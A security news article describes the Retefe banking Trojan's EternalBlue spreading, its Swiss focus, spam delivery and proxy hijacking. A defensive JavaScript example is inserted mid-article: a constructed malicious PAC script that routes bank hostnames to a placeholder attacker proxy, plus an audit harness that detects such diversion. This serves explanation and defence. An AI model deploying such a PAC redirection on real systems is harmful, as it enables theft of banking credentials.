Retefe Banking Trojan Adds Support for NSA’s EternalBlue Exploit In Swiss Campaigns


Security researchers have observed a new variant of the Retefe banking Trojan that implements EternalBlue, the NSA exploit leaked online by the Shadow Brokers. Retefe is the third banking Trojan to do so: in July this year TrickBot and Emotet were the first, and both use heavily customized versions of the EternalBlue exploit to spread to other PCs on the same internal network.

Retefe First Got an EternalBlue Module on September 5

On September 5th, 2017, the Retefe banking Trojan began using the EternalBlue exploit as part of its infection chain. Its purpose is the same as in the other two Trojans: it lets the attackers extend the initial infection to other systems on the network that expose an outdated SMBv1 service. Just like TrickBot and Emotet, Retefe appears to use a modified version of the public proof-of-concept (PoC) EternalBlue exploit code. For defenders, the practical check is the same as for those earlier campaigns: hosts that still answer SMBv1 on TCP port 445 and lack the MS17-010 patch are the ones this lateral-movement module can reach.

Retefe Uses Proxy Hijacking, Tor and EternalBlue

That Retefe has added support for EternalBlue is not really a surprise. Like Qbot, it prefers small-scale attacks to a massive spam approach, and it mainly targets bank customers in several countries including Sweden, Austria, Japan and Switzerland. Several characteristics make it unusual among banking Trojans. It does not use browser hooks to inject fake login pages on top of legitimate websites. Instead, it alters the system's proxy settings so that web traffic for certain sites is routed to clones hosted on the attackers' servers, most of which sit on Tor (the Dark Web). The Trojan is still active today and targets a wide range of banks.
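The proxy-hijacking technique described above is easiest to see with a concrete proxy auto-config (PAC) script, since a PAC file is the usual way to make a system send traffic for only selected hosts through a proxy while everything else stays direct. The following is an added example, not code from the article or from Retefe itself: it assumes PAC-based redirection (one way proxy settings can route traffic selectively; Retefe's real configuration is not reproduced here), and the PAC text, the bank hostnames (`*.examplebank.test`, `onlinebanking.example.test`) and the proxy address (`proxy.attacker.test:3128`) are all invented for illustration. The harness implements the two PAC built-ins the sample uses, evaluates the script, and reports which hosts would be diverted.

```javascript
// Added example (not the article's or Retefe's code): a constructed PAC
// script of the kind a proxy-hijacking Trojan could push into a system's
// proxy settings, plus a small audit harness that evaluates it.
// All hostnames and the proxy address below are placeholders.

// Constructed sample PAC: only selected bank domains are sent to the
// attacker's proxy; everything else goes DIRECT so the victim notices nothing.
const SAMPLE_PAC = `
function FindProxyForURL(url, host) {
  if (shExpMatch(host, "*.examplebank.test") ||
      dnsDomainIs(host, "onlinebanking.example.test")) {
    return "PROXY proxy.attacker.test:3128";
  }
  return "DIRECT";
}
`;

// Escape a literal string for use inside a RegExp.
function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Minimal implementations of the PAC built-ins used by the sample script.
const pacBuiltins = {
  // shExpMatch: shell-style glob where "*" matches any run of characters.
  shExpMatch(str, pattern) {
    const re = new RegExp(
      "^" + pattern.split("*").map(escapeRegExp).join(".*") + "$", "i");
    return re.test(str);
  },
  // dnsDomainIs: true when the host ends with the given domain suffix.
  dnsDomainIs(host, domain) {
    return host.toLowerCase().endsWith(domain.toLowerCase());
  },
};

// Compile the PAC text into a callable FindProxyForURL, exposing only the
// built-ins above to the script (the PAC is treated as untrusted input).
function loadPac(pacText) {
  const names = Object.keys(pacBuiltins);
  const factory = new Function(...names, pacText + "\nreturn FindProxyForURL;");
  return factory(...names.map((n) => pacBuiltins[n]));
}

// Evaluate the PAC for each host and return a map of host -> proxy decision
// for every host that is NOT sent DIRECT, i.e. the hosts being hijacked.
function auditPac(pacText, hosts) {
  const findProxy = loadPac(pacText);
  const hijacked = {};
  for (const host of hosts) {
    const decision = findProxy("https://" + host + "/", host);
    if (decision.trim().toUpperCase() !== "DIRECT") {
      hijacked[host] = decision.trim();
    }
  }
  return hijacked;
}

// Stand-alone usage with constructed hostnames.
const SAMPLE_HOSTS = [
  "login.examplebank.test",        // matched by the glob: hijacked
  "onlinebanking.example.test",    // matched by dnsDomainIs: hijacked
  "www.example.org",               // unrelated site: DIRECT
];
console.log(auditPac(SAMPLE_PAC, SAMPLE_HOSTS));
```

On a Windows host the values worth inspecting for this kind of tampering are `AutoConfigURL` (the PAC location) and `ProxyServer` under `HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings`; feeding the downloaded PAC body and a list of the organisation's banking hostnames into `auditPac` shows exactly which destinations would be diverted.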

Retefe Mainly Focuses on Swiss Campaigns

Many security analysts believe that Retefe mainly targets Swiss banks because of the large sums involved: these banks generally serve large businesses and high-end customers. Because of its activity in Switzerland, the Swiss CERT team has kept an eye on Retefe variants. The group behind the Trojan has been spreading it since 2013 and continues to improve its attack techniques and vectors. Unlike most other banking Trojans, it concentrates on Swiss banks, where the potential payoff is high. Retefe usually operates by routing web traffic to and from the targeted banks through several proxy servers.

In recent months, Retefe has generally spread via malicious spam campaigns carrying MS Office document attachments. The attachments typically contain embedded OLE objects or Package Shell Objects, together with text and an image that encourage the user to click on them. When the user opens such an attachment and clicks the embedded object, the Trojan installs itself silently without the user's awareness.


